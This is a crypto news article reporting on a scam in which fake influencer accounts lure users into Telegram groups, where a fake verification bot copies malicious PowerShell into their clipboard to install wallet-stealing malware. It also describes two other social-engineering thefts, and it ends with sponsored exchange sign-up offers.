New crypto scam uses fake influencer accounts to lure victims into Telegram malware trap

A new wave of crypto scams has emerged, with attackers using fake X accounts to impersonate popular influencers and lure unsuspecting users into fraudulent Telegram groups.

Users are then tricked into installing malware that compromises crypto wallet data.

Scammers that move beyond simple phishing scams

According to blockchain security firm Scam Sniffer, scammers comment on legitimate posts, luring users with offers of exclusive investment information and “alpha” advice. Once people join these Telegram groups, they are immediately asked to undergo a verification process by a bot called OfficiaISafeguardBot.

The bot creates a false sense of urgency and pushes users to quickly complete the verification. However, this seemingly harmless step is a trap: upon completing the verification, the bot injects malicious PowerShell code into the user’s clipboard. When executed, the code downloads malware designed to compromise the system and steal sensitive data, including crypto wallet information.

Scam Sniffer said the malware has been flagged by VirusTotal as harmful, and previous cases of similar attacks have resulted in private keys being stolen, leading to significant financial losses.

“This represents a new evolution in crypto scams: moving beyond simple phishing to combine social engineering with malware. Stay tuned and share to protect others.”

Scams rampant

Last month, Casa CEO Nick Neuman shared a chilling story about a phishing scam he ran. In a post on X, Neuman described a call he received from a scammer pretending to be a Coinbase support agent. The scammer claimed that Neuman’s password change request had been canceled and encouraged him to click on a link in a suspicious email.

When Neuman began questioning the scammer, they dropped the act and revealed the true nature of the operation. The scammer boasted that he had recently stolen $35,000 from a victim and made it clear that the scam only targets wealthy crypto investors.

Most recently, a crypto user with the pseudonym “LeftsideEmiri” reported losing $300,000 due to a social engineering attack. According to the user, the attack started when they received a message containing a link to a KakaoTalk conversation, which was allegedly for a partnership meeting. Although the link appeared to be broken, the user clicked on it, believing it to be harmless.

In retrospect, they suspect that clicking the link led to the installation of malware, which compromised their Ethereum and Solana wallets, along with other wallets. The user made it clear that he had not approved or signed any transactions, indicating that the attack was covert and used social engineering techniques to steal funds.

SPECIAL OFFER (Sponsored) Binance Free $600 (Exclusive to CryptoPotato): Use this link to register a new account and receive an exclusive welcome offer of $600 to Binance (full details).

LIMITED OFFER for CryptoPotato readers on Bybit – Use this link to register and open a FREE $500 position with any currency!